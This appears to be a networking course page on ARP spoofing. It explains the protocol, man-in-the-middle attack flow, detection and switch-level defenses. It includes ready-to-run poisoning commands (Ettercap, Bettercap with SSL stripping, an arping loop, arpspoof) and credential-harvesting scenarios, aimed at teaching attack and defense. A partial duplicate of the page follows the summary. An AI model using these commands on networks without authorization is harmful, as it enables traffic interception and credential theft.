Computer NetworksSpoofing Attacks

Spoofing Attacks: Identity Deception in Networks

LevelIntermediate

Duration90 mins

TopicSpoofing Attacks

2 / 5

ARP Spoofing: Poisoning the Local Network

The Gateway to Local Network Attacks

On every Ethernet network, a quiet conversation takes place millions of times per day: devices ask "Who has this IP address?" and receive answers mapping IP addresses to physical MAC addresses. This is the Address Resolution Protocol (ARP)—a fundamental protocol that allows IP networking to function over Ethernet and similar technologies.

But ARP was designed in an era of implicit trust. It has no authentication, no verification, and no protection against lies. ARP spoofing exploits this vulnerability, allowing attackers to poison the address resolution tables of network devices, redirect traffic, and position themselves as invisible intermediaries in network communications. This attack is the foundation of local network penetration testing and one of the most powerful techniques for attacking switched networks.

What You Will Learn

By the end of this page, you will understand how ARP operates, why it's vulnerable, how attackers exploit it to intercept and manipulate traffic, the tools and techniques used in real-world ARP attacks, and the comprehensive defensive measures that network administrators deploy to protect their environments.

ARP Protocol Fundamentals

Before exploring the attack, we must understand the legitimate protocol and the problem it solves. ARP bridges two different addressing schemes that coexist on local networks.

The Two-Address Problem:

Ethernet frames use 48-bit MAC (Media Access Control) addresses for local delivery, while IP uses 32-bit (IPv4) or 128-bit (IPv6) logical addresses for global routing. When a device wants to send an IP packet to another device on the same local network, it needs to discover the destination's MAC address to properly encapsulate the IP packet in an Ethernet frame.

This is ARP's purpose: translate IP addresses to MAC addresses for local network communication.

ARP Message Structure (28 bytes for IPv4 over Ethernet)
Field	Size (bytes)	Typical Value	Purpose
Hardware Type	2	0x0001 (Ethernet)	Data link layer type
Protocol Type	2	0x0800 (IPv4)	Network layer protocol
Hardware Address Length	1	6 (Ethernet MACs)	Size of MAC addresses
Protocol Address Length	1	4 (IPv4 addresses)	Size of IP addresses
Operation	2	1 (Request) or 2 (Reply)	ARP operation type
Sender Hardware Address	6	Sender's MAC address	Source of this ARP message
Sender Protocol Address	4	Sender's IP address	IP claiming to originate message
Target Hardware Address	6	Unknown (00:00:00:00:00:00) or known	MAC being resolved or responded to
Target Protocol Address	4	Target's IP address	IP address being looked up

Normal ARP Operation:

Consider Host A (IP: 192.168.1.10, MAC: AA:BB:CC:DD:EE:10) wanting to communicate with Host B (IP: 192.168.1.20, MAC: AA:BB:CC:DD:EE:20):

Host A checks its ARP cache — Does it already know B's MAC address? If yes, use cached value.
ARP Request (Broadcast) — If not cached, A broadcasts an ARP Request:
- Source MAC: AA:BB:CC:DD:EE:10
- Destination MAC: FF:FF:FF:FF:FF:FF (broadcast)
- "Who has 192.168.1.20? Tell 192.168.1.10"
All hosts receive the broadcast — Every device on the local segment processes the ARP Request.
Host B responds (Unicast) — B recognizes its own IP and sends an ARP Reply:
- Source MAC: AA:BB:CC:DD:EE:20
- Destination MAC: AA:BB:CC:DD:EE:10
- "192.168.1.20 is at AA:BB:CC:DD:EE:20"
Host A updates its ARP cache — A stores the IP-to-MAC mapping for future use.
Communication proceeds — A can now send Ethernet frames to B using the discovered MAC address.

The Critical Vulnerability

ARP has absolutely no authentication mechanism. Any device can claim any IP address in its ARP messages, and other devices will believe it. There's no verification that the sender actually owns the claimed IP address. Furthermore, most systems accept unsolicited ARP replies (gratuitous ARP) and update their caches accordingly—even without having sent a request first.

ARP Cache Mechanics and Gratuitous ARP

Understanding how ARP caches work is essential to understanding the attack. The ARP cache is a local table maintained by each networked device, mapping IP addresses to MAC addresses.

ARP Cache Characteristics:

Timeout-based expiration: Entries typically expire after 15-20 minutes (varies by OS)
Dynamic updates: New ARP information can overwrite existing entries
Unsolicited update acceptance: Most systems update cache from any received ARP packet
No verification: Entries are trusted without validation

arp_cache_example.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Viewing ARP cache on different operating systems
 
# Linux
$ arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:1a:2b:3c:4d:5e   C                     eth0
192.168.1.20             ether   aa:bb:cc:dd:ee:20   C                     eth0
192.168.1.50             ether   11:22:33:44:55:66   C                     eth0
 
# Or using ip command (modern Linux)
$ ip neigh show
192.168.1.1 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE
192.168.1.50 dev eth0 lladdr 11:22:33:44:55:66 DELAY
 
# Windows
C:\> arp -a
 
Interface: 192.168.1.10 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-20     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
 
# macOS
$ arp -a
? (192.168.1.1) at 00:1a:2b:3c:4d:5e on en0 ifscope [ethernet]
? (192.168.1.20) at aa:bb:cc:dd:ee:20 on en0 ifscope [ethernet]

Gratuitous ARP:

A gratuitous ARP is an ARP packet where a device announces its own IP-to-MAC mapping without being asked. The sender and target IP addresses are the same. Legitimate uses include:

Announcing IP address changes: When a device's IP changes, it broadcasts the new mapping
Detecting IP conflicts: If another device responds, there's a duplicate IP
Updating switches: MAC address tables are refreshed
Failover in high-availability systems: Virtual IP moves between physical hosts

However, gratuitous ARP is also the primary mechanism attackers use to inject false mappings into victim caches. Since there's no authentication, a malicious gratuitous ARP is indistinguishable from a legitimate one.

Cache Poisoning Persistence

Since ARP cache entries expire, attackers must continuously send spoofed ARP messages to maintain poisoned entries. Most attack tools automatically resend ARP packets every few seconds. If the attacker stops, caches will eventually refresh with correct information—though the victim may need to re-resolve addresses first.

ARP Spoofing Attack Mechanics

ARP spoofing attacks involve an attacker sending falsified ARP messages to associate their MAC address with the IP address of a legitimate network device. This enables several attack scenarios.

Man-in-the-Middle (MITM) Attack

•Attacker poisons ARP caches of two targets (typically victim and gateway)
•Both targets send traffic destined for each other to the attacker
•Attacker forwards traffic after inspection/modification
•Communication appears normal to victims
•Enables credential capture, session hijacking, data modification

Denial of Service Attack

•Attacker sends false ARP claiming victim's IP at non-existent MAC
•Traffic destined for victim goes nowhere
•Alternatively, flood target with ARP packets to exhaust resources
•Can isolate specific hosts from network
•Simpler than MITM—no forwarding required

Detailed MITM Attack Flow:

Consider this scenario:

Victim: 192.168.1.100 (MAC: VV:VV:VV:VV:VV:VV)
Gateway: 192.168.1.1 (MAC: GG:GG:GG:GG:GG:GG)
Attacker: 192.168.1.200 (MAC: AA:AA:AA:AA:AA:AA)

Step 1: Poison Victim's ARP Cache Attacker sends to Victim:

ARP Reply: 192.168.1.1 is at AA:AA:AA:AA:AA:AA

Victim now believes the gateway's MAC is the attacker's MAC.

Step 2: Poison Gateway's ARP Cache Attacker sends to Gateway:

ARP Reply: 192.168.1.100 is at AA:AA:AA:AA:AA:AA

Gateway now believes the victim's MAC is the attacker's MAC.

Step 3: Enable IP Forwarding Attacker enables IP forwarding so intercepted packets continue to their intended destination:

echo 1 > /proc/sys/net/ipv4/ip_forward   # Linux
sysctl -w net.inet.ip.forwarding=1        # macOS

Step 4: Intercept and Forward Traffic All traffic between Victim and Gateway now flows through Attacker, who can:

Capture all data (passwords, sessions, sensitive information)
Modify traffic in transit (inject malicious content)
Selectively drop packets (targeted denial of service)
Inject new connections (attack internal services via victim's authorization)

Why This Attack Is So Dangerous

ARP spoofing combined with MITM allows attackers to bypass network segmentation, intercept encrypted traffic (by performing SSL stripping or certificate substitution), capture credentials in real-time, and maintain persistent access. It's often the first step in lateral movement after initial network access and is a fundamental technique in penetration testing.

Attack Tools and Techniques

Several well-known tools automate ARP spoofing attacks, making them accessible to attackers with minimal technical expertise while also serving as essential penetration testing tools for security professionals.

Common ARP Spoofing Tools
Tool	Platform	Key Features	Use Case
arpspoof (dsniff)	Linux	Simple CLI tool for basic ARP poisoning	Quick MITM positioning
Ettercap	Linux/Win/macOS	Full-featured MITM framework, plugin support, GUI/CLI	Comprehensive MITM with traffic analysis
Bettercap	Linux/macOS/Win	Modern extensible framework, JavaScript automation	Advanced attacks, Wi-Fi included
Cain & Abel	Windows (legacy)	GUI-based, password cracking integration	Windows-focused assessments
MITMf	Linux	MITM Framework with many attack modules	Automated attack chaining
Scapy	Linux/macOS/Win	Python packet manipulation library	Custom attack development

ettercap_mitm_example.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Ettercap ARP poisoning MITM attack example
# This demonstrates the tool usage for educational purposes
 
# Text mode: Poison entire subnet, intercept all traffic
sudo ettercap -T -M arp:remote /192.168.1.1// ///
 
# Explained:
# -T            : Text mode (no GUI)
# -M arp:remote : MITM using ARP poisoning; 'remote' for traffic to external networks
# /192.168.1.1//: First target (gateway) - IP/netmask/MAC format (empty = any)
# ///           : Second target (all hosts on subnet)
 
# Target specific hosts
sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
 
# With packet filtering (capture credentials)
sudo ettercap -T -M arp:remote -F filter.ef /192.168.1.1// /192.168.1.100//
 
# Write captured data to file
sudo ettercap -T -M arp:remote -w capture.pcap /192.168.1.1// ///
 
# Using Bettercap (modern alternative)
sudo bettercap -iface eth0
 
# In bettercap interactive mode:
> net.probe on                           # Discover hosts
> set arp.spoof.targets 192.168.1.100    # Target victim
> arp.spoof on                           # Start poisoning
> net.sniff on                           # Capture traffic
> set http.proxy.sslstrip true           # SSL stripping
> http.proxy on                          # MITM proxy

Manual ARP Spoofing with Linux CLI:

For understanding the mechanics, let's see manual ARP spoofing using basic Linux tools:

# Enable IP forwarding (required for MITM, not DoS)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Send spoofed ARP replies continuously
# Tell victim (192.168.1.100) that gateway (192.168.1.1) is at our MAC
while true; do
    sudo arping -c 1 -U -s 192.168.1.1 -S 192.168.1.1 192.168.1.100 &
    # Tell gateway that victim is at our MAC
    sudo arping -c 1 -U -s 192.168.1.100 -S 192.168.1.100 192.168.1.1 &
    sleep 2
done

# Alternative using arpspoof (from dsniff package)
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 &   # Spoof gateway to victim
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 &   # Spoof victim to gateway

SSL Stripping Considerations

ARP spoofing alone doesn't break HTTPS—but it enables SSL stripping attacks where the attacker maintains HTTPS connections to servers while serving HTTP to victims. Modern defenses like HSTS (HTTP Strict Transport Security), HSTS preloading, and certificate pinning significantly limit these attacks. However, initial HTTP connections, non-HSTS sites, and misconfigured applications remain vulnerable.

Impact and Real-World Scenarios

ARP spoofing has been used in countless real-world attacks and remains a fundamental technique in internal network assessments. Understanding its impact helps appreciate the importance of defenses.

Attack Scenarios Enabled by ARP Spoofing

•Credential Harvesting: Position between users and authentication servers to capture login credentials. Even with HTTPS, metadata, session cookies (on misconfigured sites), and fallback connections can be captured.
•Session Hijacking: Capture session tokens or cookies to take over authenticated sessions. Particularly effective against applications not using secure cookie flags.
•VoIP Eavesdropping: Intercept Voice over IP traffic (SIP signaling, RTP media streams). Unencrypted VoIP traffic can be reconstructed into audio files.
•DNS Manipulation: Modify DNS responses in transit to redirect victims to malicious sites. Enables phishing attacks without DNS server compromise.
•Malware Injection: Inject malicious content into unencrypted HTTP responses. Drive-by downloads, cryptomining scripts, or browser exploits.
•Lateral Movement: After initial compromise, ARP spoof to intercept traffic of high-value targets (IT admins, executives) for credential escalation.
•Data Exfiltration Monitoring: Intercept traffic to understand data flows and identify exfiltration opportunities.
•Internal Reconnaissance: Passive observation of all network traffic reveals services, protocols, authentication patterns, and vulnerabilities.

Case Study: Internal Penetration Test Pattern

A typical penetration test leveraging ARP spoofing might proceed as follows:

Initial Access: Compromise one workstation via phishing, external vulnerability, or physical access
Network Reconnaissance: Identify network layout, gateway, high-value targets (servers, admin workstations)
ARP Poisoning: Position between target workstations and servers/gateway
Credential Capture: Harvest credentials from NTLM authentication, HTTP forms, LDAP binds
Session Analysis: Identify administrative sessions, database connections
Privilege Escalation: Use captured admin credentials to access servers
Lateral Movement: Extend access using obtained privileges
Objective Achievement: Access sensitive data, demonstrate domain compromise

This pattern demonstrates why ARP security is critical even in networks with perimeter defenses—once an attacker has any internal access, ARP spoofing dramatically accelerates compromise.

Shared Network Environments

ARP spoofing is particularly dangerous in environments with untrusted or semi-trusted users on the same network segment: hotels, coffee shops, conference networks, university networks, shared office spaces, and even some corporate guest networks. Users should assume local network traffic could be monitored and rely only on encrypted, authenticated protocols.

Detection Methods

Detecting ARP spoofing attacks requires monitoring for anomalous ARP behavior, duplicate MAC addresses, and other indicators of cache poisoning attempts.

ARP Spoofing Detection Techniques
Technique	Mechanism	Effectiveness	Implementation
ARP Watch	Monitor for ARP (IP-MAC) mapping changes	High for detecting changes	arpwatch daemon, custom scripts
Duplicate MAC Detection	Alert when same MAC claims multiple IPs	High for simple attacks	Switch port security, IDS rules
Gratuitous ARP Monitoring	Track unsolicited ARP replies	Medium (false positives from legitimate use)	Network monitoring tools
Gateway MAC Correlation	Verify gateway MAC against known value	High for gateway impersonation	Host-based verification scripts
ARP Rate Limiting	Detect hosts sending excessive ARP traffic	Medium (tuning required)	Switch features, IDS
RARP Verification	Request reverse resolution to verify mappings	Medium (can be spoofed too)	Custom implementations
Traffic Pattern Analysis	Detect traffic flowing through unexpected hosts	Medium (requires baseline)	IDS/NDR systems

arp_detection_examples.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# Using arpwatch to monitor for ARP changes (Linux)
# Arpwatch logs all ARP IP/MAC bindings and alerts on changes
 
# Install
sudo apt-get install arpwatch
 
# Start monitoring on eth0
sudo arpwatch -i eth0
 
# View logs for suspicious activity
tail -f /var/log/arpwatch.log
 
# Example log entries indicating potential spoofing:
# changed ethernet address 192.168.1.1 00:1a:2b:3c:4d:5e (aa:aa:aa:aa:aa:aa)
# This shows gateway's MAC "changed" - likely an attack!
 
# Manual check: Compare current ARP to expected gateway MAC
# If you know your gateway MAC is 00:1a:2b:3c:4d:5e:
EXPECTED_MAC="00:1a:2b:3c:4d:5e"
CURRENT_MAC=$(arp -n 192.168.1.1 | awk '/192.168.1.1/{print $3}')
if [ "$CURRENT_MAC" != "$EXPECTED_MAC" ]; then
    echo "WARNING: Gateway MAC mismatch! Possible ARP spoofing!"
    echo "Expected: $EXPECTED_MAC"
    echo "Current:  $CURRENT_MAC"
fi
 
# Using Scapy for ARP monitoring (Python)
#!/usr/bin/env python3
from scapy.all import *
 
def arp_monitor(packet):
    if ARP in packet and packet[ARP].op == 2:  # ARP Reply
        # Check if this mapping is expected
        sender_ip = packet[ARP].psrc
        sender_mac = packet[ARP].hwsrc
        print(f"ARP Reply: {sender_ip} -> {sender_mac}")
        # Add validation logic here
 
sniff(filter="arp", prn=arp_monitor, store=0)

Detection Challenges

Legitimate network events can trigger ARP alerts: DHCP reassignments, virtual machine migrations, failover systems, and network troubleshooting. Effective detection requires understanding normal network behavior and tuning rules to minimize false positives while catching actual attacks. Correlation with other indicators (traffic patterns, time of day, user activity) improves accuracy.

Defense and Prevention Strategies

Preventing ARP spoofing requires a multi-layered approach combining static configurations, switch-level controls, network segmentation, and endpoint security measures.

Defense Mechanisms

•Static ARP Entries: Manually configure critical IP-to-MAC mappings that cannot be overwritten by dynamic ARP. Most effective for gateways and critical servers. Limited scalability for large networks.
•Dynamic ARP Inspection (DAI): Cisco switch feature that validates ARP packets against DHCP snooping binding database. Dropped if source MAC/IP doesn't match DHCP assignment. Industry standard on managed switches.
•DHCP Snooping: Switch tracks DHCP assignments to build trusted IP-MAC binding table. Foundation for DAI and IP Source Guard. Distinguishes trusted (DHCP server) and untrusted ports.
•Port Security: Limit allowed MAC addresses per switch port. Prevents attacker from having their MAC accepted on the network. Can work with DAI for comprehensive control.
•Private VLANs: Isolate hosts within the same subnet so they cannot communicate directly. Traffic forced through router/firewall even for same-subnet destinations. Prevents layer-2 attacks between isolated hosts.
•802.1X Port Authentication: Require authentication before granting network access. Combined with dynamic VLAN assignment. Reduces attack surface to authenticated users only.
•Network Segmentation: Limit broadcast domain size. ARP only works within broadcast domains. Smaller segments reduce ARP attack impact.
•Encrypted Protocols Only: Even if MITM succeeds, encrypted traffic (TLS, SSH, IPsec) resists inspection. HSTS prevents SSL stripping. Certificate pinning detects impersonation.

cisco_dai_config.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
! Cisco IOS Configuration for ARP Spoofing Prevention
! This shows DAI (Dynamic ARP Inspection) setup with DHCP Snooping
 
! Step 1: Enable DHCP Snooping globally and on VLANs
ip dhcp snooping
ip dhcp snooping vlan 10,20,30
 
! Step 2: Configure trusted ports (uplinks, DHCP servers)
interface GigabitEthernet0/1
 description Uplink to Core
 ip dhcp snooping trust
 ip arp inspection trust
 
interface GigabitEthernet0/2
 description DHCP Server
 ip dhcp snooping trust
 ip arp inspection trust
 
! Step 3: Enable DAI on VLANs
ip arp inspection vlan 10,20,30
 
! Step 4: Configure DAI rate limiting (optional, prevents DoS via ARP flood)
interface range GigabitEthernet0/3 - 48
 description User Access Ports
 ip arp inspection limit rate 15 burst interval 1
 ! 15 ARP packets per second max
 
! Step 5: Additional DAI validation (optional but recommended)
ip arp inspection validate src-mac dst-mac ip
! Validates source/destination MAC in Ethernet matches ARP payload
! Validates IP addresses are not invalid (0.0.0.0, broadcast, etc.)
 
! Step 6: Port Security (complement to DAI)
interface range GigabitEthernet0/3 - 48
 switchport port-security
 switchport port-security maximum 3
 switchport port-security violation restrict
 switchport port-security aging time 120
 
! View DAI statistics
show ip arp inspection statistics
show ip arp inspection vlan 10
show ip dhcp snooping binding

Static ARP Configuration (Defense for Critical Systems):

# Linux: Add static ARP entry for gateway
sudo arp -s 192.168.1.1 00:1a:2b:3c:4d:5e

# Make persistent (add to /etc/network/interfaces or rc.local)
echo "arp -s 192.168.1.1 00:1a:2b:3c:4d:5e" >> /etc/rc.local

# Windows: Static ARP
netsh interface ip add neighbors "Ethernet" 192.168.1.1 00-1a-2b-3c-4d-5e

# Verify static entry (shows PERM or static)
arp -a | grep 192.168.1.1

Static entries are immune to ARP spoofing but require manual management. They're most practical for protecting critical hosts' gateway mappings rather than all network mappings.

Defense in Depth

The most robust protection combines switch-level controls (DAI, DHCP Snooping), network design (segmentation, private VLANs), endpoint configuration (static gateway ARP), and application-level encryption (TLS everywhere, HSTS). No single mechanism is sufficient—assume each layer might fail and design accordingly.

Summary: ARP Spoofing Mastery

ARP spoofing is one of the most powerful attacks available on local networks, exploiting a fundamental trust assumption in the protocol that bridges IP and Ethernet addressing.

Key Takeaways

•Protocol vulnerability — ARP has no authentication; any device can claim any IP address, and other devices will accept the mapping
•Cache poisoning — Attackers inject false IP-to-MAC mappings into victim ARP caches using spoofed ARP replies, including unsolicited gratuitous ARP
•MITM foundation — ARP spoofing positions attackers to intercept all traffic between victims, enabling credential capture, session hijacking, and data manipulation
•Tool availability — Mature tools (Ettercap, Bettercap, arpspoof) make attacks accessible; also essential for legitimate security testing
•Detection possible — ARP monitoring (arpwatch), duplicate MAC detection, and traffic analysis can identify attacks, though false positives require tuning
•Prevention via switch features — Dynamic ARP Inspection, DHCP Snooping, and Port Security provide enterprise-grade protection on managed switches
•Defense in depth essential — Combine switch controls, network segmentation, static entries for critical hosts, and encrypted protocols for comprehensive protection

What's Next:

While ARP spoofing operates at the data link layer within local networks, similar identity deception attacks occur at the application layer. The next page explores DNS spoofing—an attack that poisons the name-to-IP resolution process to redirect users to malicious destinations.

Page Complete

You now understand ARP spoofing comprehensively: the protocol vulnerability, attack mechanics, tools, impact, detection, and prevention. This knowledge is fundamental for both attacking and defending local networks, and forms the basis for understanding the man-in-the-middle attack category.

2 / 5

Loading learning content...

Computer NetworksSpoofing Attacks

Spoofing Attacks: Identity Deception in Networks

LevelIntermediate

Duration90 mins

TopicSpoofing Attacks

2 / 5

ARP Spoofing: Poisoning the Local Network

The Gateway to Local Network Attacks

What You Will Learn

ARP Protocol Fundamentals

Before exploring the attack, we must understand the legitimate protocol and the problem it solves. ARP bridges two different addressing schemes that coexist on local networks.

The Two-Address Problem:

This is ARP's purpose: translate IP addresses to MAC addresses for local network communication.

ARP Message Structure (28 bytes for IPv4 over Ethernet)
Field	Size (bytes)	Typical Value	Purpose
Hardware Type	2	0x0001 (Ethernet)	Data link layer type
Protocol Type	2	0x0800 (IPv4)	Network layer protocol
Hardware Address Length	1	6 (Ethernet MACs)	Size of MAC addresses
Protocol Address Length	1	4 (IPv4 addresses)	Size of IP addresses
Operation	2	1 (Request) or 2 (Reply)	ARP operation type
Sender Hardware Address	6	Sender's MAC address	Source of this ARP message
Sender Protocol Address	4	Sender's IP address	IP claiming to originate message
Target Hardware Address	6	Unknown (00:00:00:00:00:00) or known	MAC being resolved or responded to
Target Protocol Address	4	Target's IP address	IP address being looked up

Normal ARP Operation:

Consider Host A (IP: 192.168.1.10, MAC: AA:BB:CC:DD:EE:10) wanting to communicate with Host B (IP: 192.168.1.20, MAC: AA:BB:CC:DD:EE:20):

Host A checks its ARP cache — Does it already know B's MAC address? If yes, use cached value.
ARP Request (Broadcast) — If not cached, A broadcasts an ARP Request:
- Source MAC: AA:BB:CC:DD:EE:10
- Destination MAC: FF:FF:FF:FF:FF:FF (broadcast)
- "Who has 192.168.1.20? Tell 192.168.1.10"
All hosts receive the broadcast — Every device on the local segment processes the ARP Request.
Host B responds (Unicast) — B recognizes its own IP and sends an ARP Reply:
- Source MAC: AA:BB:CC:DD:EE:20
- Destination MAC: AA:BB:CC:DD:EE:10
- "192.168.1.20 is at AA:BB:CC:DD:EE:20"
Host A updates its ARP cache — A stores the IP-to-MAC mapping for future use.
Communication proceeds — A can now send Ethernet frames to B using the discovered MAC address.

The Critical Vulnerability

ARP Cache Mechanics and Gratuitous ARP

Understanding how ARP caches work is essential to understanding the attack. The ARP cache is a local table maintained by each networked device, mapping IP addresses to MAC addresses.

ARP Cache Characteristics:

Timeout-based expiration: Entries typically expire after 15-20 minutes (varies by OS)
Dynamic updates: New ARP information can overwrite existing entries
Unsolicited update acceptance: Most systems update cache from any received ARP packet
No verification: Entries are trusted without validation

arp_cache_example.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Viewing ARP cache on different operating systems
 
# Linux
$ arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:1a:2b:3c:4d:5e   C                     eth0
192.168.1.20             ether   aa:bb:cc:dd:ee:20   C                     eth0
192.168.1.50             ether   11:22:33:44:55:66   C                     eth0
 
# Or using ip command (modern Linux)
$ ip neigh show
192.168.1.1 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE
192.168.1.50 dev eth0 lladdr 11:22:33:44:55:66 DELAY
 
# Windows
C:\> arp -a
 
Interface: 192.168.1.10 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-20     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
 
# macOS
$ arp -a
? (192.168.1.1) at 00:1a:2b:3c:4d:5e on en0 ifscope [ethernet]
? (192.168.1.20) at aa:bb:cc:dd:ee:20 on en0 ifscope [ethernet]

Gratuitous ARP:

A gratuitous ARP is an ARP packet where a device announces its own IP-to-MAC mapping without being asked. The sender and target IP addresses are the same. Legitimate uses include:

Announcing IP address changes: When a device's IP changes, it broadcasts the new mapping
Detecting IP conflicts: If another device responds, there's a duplicate IP
Updating switches: MAC address tables are refreshed
Failover in high-availability systems: Virtual IP moves between physical hosts

Cache Poisoning Persistence

ARP Spoofing Attack Mechanics

ARP spoofing attacks involve an attacker sending falsified ARP messages to associate their MAC address with the IP address of a legitimate network device. This enables several attack scenarios.

Man-in-the-Middle (MITM) Attack

•Attacker poisons ARP caches of two targets (typically victim and gateway)
•Both targets send traffic destined for each other to the attacker
•Attacker forwards traffic after inspection/modification
•Communication appears normal to victims
•Enables credential capture, session hijacking, data modification

Denial of Service Attack

•Attacker sends false ARP claiming victim's IP at non-existent MAC
•Traffic destined for victim goes nowhere
•Alternatively, flood target with ARP packets to exhaust resources
•Can isolate specific hosts from network
•Simpler than MITM—no forwarding required

Detailed MITM Attack Flow:

Consider this scenario:

Victim: 192.168.1.100 (MAC: VV:VV:VV:VV:VV:VV)
Gateway: 192.168.1.1 (MAC: GG:GG:GG:GG:GG:GG)
Attacker: 192.168.1.200 (MAC: AA:AA:AA:AA:AA:AA)

Step 1: Poison Victim's ARP Cache Attacker sends to Victim:

ARP Reply: 192.168.1.1 is at AA:AA:AA:AA:AA:AA

Victim now believes the gateway's MAC is the attacker's MAC.

Step 2: Poison Gateway's ARP Cache Attacker sends to Gateway:

ARP Reply: 192.168.1.100 is at AA:AA:AA:AA:AA:AA

Gateway now believes the victim's MAC is the attacker's MAC.

Step 3: Enable IP Forwarding Attacker enables IP forwarding so intercepted packets continue to their intended destination:

echo 1 > /proc/sys/net/ipv4/ip_forward   # Linux
sysctl -w net.inet.ip.forwarding=1        # macOS

Step 4: Intercept and Forward Traffic All traffic between Victim and Gateway now flows through Attacker, who can:

Capture all data (passwords, sessions, sensitive information)
Modify traffic in transit (inject malicious content)
Selectively drop packets (targeted denial of service)
Inject new connections (attack internal services via victim's authorization)

Why This Attack Is So Dangerous

Attack Tools and Techniques

Common ARP Spoofing Tools
Tool	Platform	Key Features	Use Case
arpspoof (dsniff)	Linux	Simple CLI tool for basic ARP poisoning	Quick MITM positioning
Ettercap	Linux/Win/macOS	Full-featured MITM framework, plugin support, GUI/CLI	Comprehensive MITM with traffic analysis
Bettercap	Linux/macOS/Win	Modern extensible framework, JavaScript automation	Advanced attacks, Wi-Fi included
Cain & Abel	Windows (legacy)	GUI-based, password cracking integration	Windows-focused assessments
MITMf	Linux	MITM Framework with many attack modules	Automated attack chaining
Scapy	Linux/macOS/Win	Python packet manipulation library	Custom attack development

ettercap_mitm_example.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Ettercap ARP poisoning MITM attack example
# This demonstrates the tool usage for educational purposes
 
# Text mode: Poison entire subnet, intercept all traffic
sudo ettercap -T -M arp:remote /192.168.1.1// ///
 
# Explained:
# -T            : Text mode (no GUI)
# -M arp:remote : MITM using ARP poisoning; 'remote' for traffic to external networks
# /192.168.1.1//: First target (gateway) - IP/netmask/MAC format (empty = any)
# ///           : Second target (all hosts on subnet)
 
# Target specific hosts
sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
 
# With packet filtering (capture credentials)
sudo ettercap -T -M arp:remote -F filter.ef /192.168.1.1// /192.168.1.100//
 
# Write captured data to file
sudo ettercap -T -M arp:remote -w capture.pcap /192.168.1.1// ///
 
# Using Bettercap (modern alternative)
sudo bettercap -iface eth0
 
# In bettercap interactive mode:
> net.probe on                           # Discover hosts
> set arp.spoof.targets 192.168.1.100    # Target victim
> arp.spoof on                           # Start poisoning
> net.sniff on                           # Capture traffic
> set http.proxy.sslstrip true           # SSL stripping
> http.proxy on                          # MITM proxy

Manual ARP Spoofing with Linux CLI:

For understanding the mechanics, let's see manual ARP spoofing using basic Linux tools:

# Enable IP forwarding (required for MITM, not DoS)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Send spoofed ARP replies continuously
# Tell victim (192.168.1.100) that gateway (192.168.1.1) is at our MAC
while true; do
    sudo arping -c 1 -U -s 192.168.1.1 -S 192.168.1.1 192.168.1.100 &
    # Tell gateway that victim is at our MAC
    sudo arping -c 1 -U -s 192.168.1.100 -S 192.168.1.100 192.168.1.1 &
    sleep 2
done

# Alternative using arpspoof (from dsniff package)
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 &   # Spoof gateway to victim
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 &   # Spoof victim to gateway

SSL Stripping Considerations

Impact and Real-World Scenarios

ARP spoofing has been used in countless real-world attacks and remains a fundamental technique in internal network assessments. Understanding its impact helps appreciate the importance of defenses.

Attack Scenarios Enabled by ARP Spoofing

•Credential Harvesting: Position between users and authentication servers to capture login credentials. Even with HTTPS, metadata, session cookies (on misconfigured sites), and fallback connections can be captured.
•Session Hijacking: Capture session tokens or cookies to take over authenticated sessions. Particularly effective against applications not using secure cookie flags.
•VoIP Eavesdropping: Intercept Voice over IP traffic (SIP signaling, RTP media streams). Unencrypted VoIP traffic can be reconstructed into audio files.
•DNS Manipulation: Modify DNS responses in transit to redirect victims to malicious sites. Enables phishing attacks without DNS server compromise.
•Malware Injection: Inject malicious content into unencrypted HTTP responses. Drive-by downloads, cryptomining scripts, or browser exploits.
•Lateral Movement: After initial compromise, ARP spoof to intercept traffic of high-value targets (IT admins, executives) for credential escalation.
•Data Exfiltration Monitoring: Intercept traffic to understand data flows and identify exfiltration opportunities.
•Internal Reconnaissance: Passive observation of all network traffic reveals services, protocols, authentication patterns, and vulnerabilities.

Case Study: Internal Penetration Test Pattern

A typical penetration test leveraging ARP spoofing might proceed as follows:

Initial Access: Compromise one workstation via phishing, external vulnerability, or physical access
Network Reconnaissance: Identify network layout, gateway, high-value targets (servers, admin workstations)
ARP Poisoning: Position between target workstations and servers/gateway
Credential Capture: Harvest credentials from NTLM authentication, HTTP forms, LDAP binds
Session Analysis: Identify administrative sessions, database connections
Privilege Escalation: Use captured admin credentials to access servers
Lateral Movement: Extend access using obtained privileges
Objective Achievement: Access sensitive data, demonstrate domain compromise

